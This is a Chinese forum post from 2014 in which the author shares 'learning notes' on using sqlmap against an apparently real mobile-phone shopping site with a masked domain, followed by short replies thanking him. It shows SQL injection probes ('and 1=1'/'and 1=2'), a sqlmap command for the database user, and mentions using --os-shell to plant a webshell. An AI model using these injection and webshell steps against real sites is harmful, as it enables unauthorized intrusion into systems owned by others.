学习笔记-Sqlmap注入丫丫手机商城

Ky.Mast · 发表于 2014-11-13 14:48:41

学习笔记-Sqlmap注入丫丫手机商城
第二天学习sqlmap了，昨晚上对KALI的奋斗实在是蛋疼，不过让我对简单的注入语句更加熟练了，下面是个学习例子。
目标：www.XXXX.com
打码了，各位不要轮训了太可怕了天朝~~,没技术含量更没最终的shell，后台屏蔽~
word文档格式，懒得排版了
0x1
注入点：http://www.XXX.com/news/specials.php?nid=10028
And 1=1 返回正常 and 1=2 返回错误
扔进sqlmap,神器里面开始注射精子~~[我有点淫荡了，可能是因为光棍节问题]
查看数据库用户 DBMS是数据库mysql5.0
Sqlmap.py –u “http://www.XXX.com/news/specials.php?nid=10028” –current-user
如果是root的话，可以考虑爆路径，然后—os-shell写一句话进去这里不是，略过…

游客，如果您要查看本帖隐藏内容请回复

邪恶的孩子2 · 发表于 2014-11-13 15:35:58

看看，支持原创

乐生乐道 · 发表于 2014-11-13 15:54:47

支持原创，看看

rabit2013 · 发表于 2014-11-13 16:32:52

提示: 作者被禁止或删除内容自动屏蔽

神风 · 发表于 2014-11-13 17:29:16

支持一下。

冰锐 · 发表于 2014-11-13 19:31:44

谢谢分享

member · 发表于 2014-11-13 22:50:27

感谢分享.拿走学习了

490589699 · 发表于 2014-11-14 01:58:50

学习下。。。。

suifeng3 · 发表于 2014-11-14 09:28:27

正好学习一下sqlmap

yooz · 发表于 2014-11-14 12:35:49

谢谢分享啊

rabit2013 rabit2013 当前离线积分 8 头像被屏蔽该用户从未签到	发表于 2014-11-13 16:32:52 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
rabit2013 rabit2013 当前离线积分 8 头像被屏蔽该用户从未签到
	回复支持反对使用道具举报

学习笔记-Sqlmap注入丫丫手机商城

评分

指导单位

旗下站点

联系我们